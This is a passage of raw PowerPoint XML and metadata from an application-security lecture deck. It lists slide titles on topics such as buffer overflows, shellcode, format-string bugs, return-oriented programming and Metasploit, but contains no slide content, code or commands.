      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="adam_seclab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76200">
          <a:headEnd type="none"/>
          <a:tailEnd type="triangle"/>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150780</TotalTime>
  <Words>40615</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>13399</Paragraphs>
  <Slides>424</Slides>
  <Notes>132</Notes>
  <HiddenSlides>35</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424</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="436" baseType="lpstr">
      <vt:lpstr>MS Mincho</vt:lpstr>
      <vt:lpstr>ヒラギノ角ゴ Pro W3</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Hack</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>adam_seclab_theme</vt:lpstr>
      <vt:lpstr>Application Insecurity</vt:lpstr>
      <vt:lpstr>Application Security</vt:lpstr>
      <vt:lpstr>Application Model</vt:lpstr>
      <vt:lpstr>Application Vulnerability Analysis</vt:lpstr>
      <vt:lpstr>Design Vulnerabilities</vt:lpstr>
      <vt:lpstr>Implementation Vulnerabilities</vt:lpstr>
      <vt:lpstr>Deployment Vulnerabilities</vt:lpstr>
      <vt:lpstr>Remote vs. Local Attacks </vt:lpstr>
      <vt:lpstr>The Life of an Application</vt:lpstr>
      <vt:lpstr>Interpretation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>The ELF File Format</vt:lpstr>
      <vt:lpstr>The ELF File Format</vt:lpstr>
      <vt:lpstr>ELF Sections</vt:lpstr>
      <vt:lpstr>Typical ELF Sections</vt:lpstr>
      <vt:lpstr>The PE File Format</vt:lpstr>
      <vt:lpstr>The x86 CPU Family</vt:lpstr>
      <vt:lpstr>Memory Addressing in x86</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>EFLAGS</vt:lpstr>
      <vt:lpstr>Data Sizes</vt:lpstr>
      <vt:lpstr>Beware of the Endianess  (and of Signed Integers)!</vt:lpstr>
      <vt:lpstr>x86 Assembly Language</vt:lpstr>
      <vt:lpstr>Data Definition</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Invoking System Calls</vt:lpstr>
      <vt:lpstr>Hello World!</vt:lpstr>
      <vt:lpstr>PLT and GOT</vt:lpstr>
      <vt:lpstr>The .dtors Section</vt:lpstr>
      <vt:lpstr>Program Loading and Execution</vt:lpstr>
      <vt:lpstr>Process Memory Layout</vt:lpstr>
      <vt:lpstr>Process Structure</vt:lpstr>
      <vt:lpstr>Understanding UNIX Processes</vt:lpstr>
      <vt:lpstr>SUID Behavior</vt:lpstr>
      <vt:lpstr>Disassembling</vt:lpstr>
      <vt:lpstr>Radare</vt:lpstr>
      <vt:lpstr>IDA Pro</vt:lpstr>
      <vt:lpstr>Hopper</vt:lpstr>
      <vt:lpstr>Attacking UNIX Systems</vt:lpstr>
      <vt:lpstr>Attacking UNIX Applications</vt:lpstr>
      <vt:lpstr>Attack Classes</vt:lpstr>
      <vt:lpstr>File Access Attacks</vt:lpstr>
      <vt:lpstr>The Dot-Dot Attack</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>PATH and HOME Attacks</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Link Attacks</vt:lpstr>
      <vt:lpstr>The dtappgather Attack</vt:lpstr>
      <vt:lpstr>The dtappgather Attack</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>TOCTTOU Attacks</vt:lpstr>
      <vt:lpstr>TOCTTOU Example</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>File Handler Reuse</vt:lpstr>
      <vt:lpstr>The chpass Attack</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>A Simple Example</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Overflows/Overwrites</vt:lpstr>
      <vt:lpstr>The Stack</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>Function Frames</vt:lpstr>
      <vt:lpstr>Calling Convention</vt:lpstr>
      <vt:lpstr>x86 Linux Calling Convention (cdecl)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Stack Overflows</vt:lpstr>
      <vt:lpstr>Implications of Cdecl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“Overflowing” Functions </vt:lpstr>
      <vt:lpstr>How to Exploit a Stack Overflow</vt:lpstr>
      <vt:lpstr>Shellcode Goal</vt:lpstr>
      <vt:lpstr>C-version of Shellcode</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>The Shell Code</vt:lpstr>
      <vt:lpstr>Invoking the System Calls</vt:lpstr>
      <vt:lpstr>Preliminary Shellcode</vt:lpstr>
      <vt:lpstr>Preliminary Shellcode</vt:lpstr>
      <vt:lpstr>Testing the Shell Code</vt:lpstr>
      <vt:lpstr>Preliminary Shellcode</vt:lpstr>
      <vt:lpstr>Position Independent Shellcode</vt:lpstr>
      <vt:lpstr>Position Independent Shellcode</vt:lpstr>
      <vt:lpstr>Testing the Shell Code</vt:lpstr>
      <vt:lpstr>No Null No Newline Shellcode</vt:lpstr>
      <vt:lpstr>Testing the Shell Code</vt:lpstr>
      <vt:lpstr>Jumping to the Shell Code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went wrong?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Guessing the Buffer Address</vt:lpstr>
      <vt:lpstr>NOP Sled</vt:lpstr>
      <vt:lpstr>Overflowing Small Buffers</vt:lpstr>
      <vt:lpstr>Generalizing Memory Corruption</vt:lpstr>
      <vt:lpstr>What Is Overwritten</vt:lpstr>
      <vt:lpstr>What is Overwritten: Long Jumps</vt:lpstr>
      <vt:lpstr>setjmp() and longjmp()</vt:lpstr>
      <vt:lpstr>jmp_buf Implementation</vt:lpstr>
      <vt:lpstr>jmp_buf Implementation</vt:lpstr>
      <vt:lpstr>Designing an Exploit</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>What is Overwritten:  A Carefully (?) Developed Program</vt:lpstr>
      <vt:lpstr>Non-terminated String Overflow</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Index Overflow</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Overflows</vt:lpstr>
      <vt:lpstr>Integer Overflows: Teardrop</vt:lpstr>
      <vt:lpstr>Integer Overflows: Teardrop</vt:lpstr>
      <vt:lpstr>Integer Overflows: Teardrop</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Loop Overflows</vt:lpstr>
      <vt:lpstr>Off-by-one Overflow: Example</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>Overflown Stack Before Returning</vt:lpstr>
      <vt:lpstr>Tracking The Frame Pointer</vt:lpstr>
      <vt:lpstr>Exploiting an Off-by-one Overflow</vt:lpstr>
      <vt:lpstr>Smashing the Frame Pointer</vt:lpstr>
      <vt:lpstr>Finding the Buffer Address</vt:lpstr>
      <vt:lpstr>Determining &amp;&amp;shellcode</vt:lpstr>
      <vt:lpstr>Computing the Overflowing Byte  and &amp;shellcode</vt:lpstr>
      <vt:lpstr>Overflowed Buffer Contents</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>func() Epilogue</vt:lpstr>
      <vt:lpstr>What Happens Next?</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>main() Epilogue</vt:lpstr>
      <vt:lpstr>Lessons Learned </vt:lpstr>
      <vt:lpstr>What is Overwritten: Format String Vulnerabilities</vt:lpstr>
      <vt:lpstr>printf()’s Lesser Known Facts</vt:lpstr>
      <vt:lpstr>A Simple Vulnerable Program</vt:lpstr>
      <vt:lpstr>Sample Executions</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>GOT</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>Format String Exploitation</vt:lpstr>
      <vt:lpstr>The locale attack</vt:lpstr>
      <vt:lpstr>LC_MESSAGE/libc.po</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Where is Overwritten:  DATA and BSS Overflows</vt:lpstr>
      <vt:lpstr>Where is Overwritten: Heap Overflows</vt:lpstr>
      <vt:lpstr>Heap Overflows</vt:lpstr>
      <vt:lpstr>Simple Heap Overflow</vt:lpstr>
      <vt:lpstr>Simple Heap Overflow</vt:lpstr>
      <vt:lpstr>Case Study: Doug Lea’s Malloc</vt:lpstr>
      <vt:lpstr>Memory Layout</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Chunk Management</vt:lpstr>
      <vt:lpstr>Bin Management</vt:lpstr>
      <vt:lpstr>Memory Allocation</vt:lpstr>
      <vt:lpstr>Memory Deallocation</vt:lpstr>
      <vt:lpstr>List Handling: unlink()</vt:lpstr>
      <vt:lpstr>List Handling: frontlink()</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Exploiting the unlink() macro</vt:lpstr>
      <vt:lpstr>Double free() Vulnerabilities</vt:lpstr>
      <vt:lpstr>Overwriting C++ Vtables</vt:lpstr>
      <vt:lpstr>Memory Corruption Protections</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>Linux Stack Protection</vt:lpstr>
      <vt:lpstr>DEP and W^X</vt:lpstr>
      <vt:lpstr>Problem with Non-Executable Memory</vt:lpstr>
      <vt:lpstr>Return-into-libc Exploit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Function chaining</vt:lpstr>
      <vt:lpstr>Address Space Layout Randomization</vt:lpstr>
      <vt:lpstr>ASLR in Linux</vt:lpstr>
      <vt:lpstr>Exploitation under ASLR</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>Building the ROP chain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ROP</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>StackGuard</vt:lpstr>
      <vt:lpstr>Stack Canaries in Linux</vt:lpstr>
      <vt:lpstr>Bypassing Canaries</vt:lpstr>
      <vt:lpstr>Making Exploitation Harder</vt:lpstr>
      <vt:lpstr>Control Flow Integrity</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit Distributions/Tools</vt:lpstr>
      <vt:lpstr>Metasploit on Kali Linux</vt:lpstr>
      <vt:lpstr>General Process </vt:lpstr>
      <vt:lpstr>Metasploit Components</vt:lpstr>
      <vt:lpstr>Metasploit Modules</vt:lpstr>
      <vt:lpstr>Metasploit Console</vt:lpstr>
      <vt:lpstr>The Meterpreter</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <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creator>
  <cp:lastModifiedBy>Adam Doupé</cp:lastModifiedBy>
  <cp:revision>3799</cp:revision>
  <cp:lastPrinted>2011-10-05T20:20:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-09-20T20:28:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-31T21:49:32Z</dcterms:modified>
</cp:coreProperties>
</file>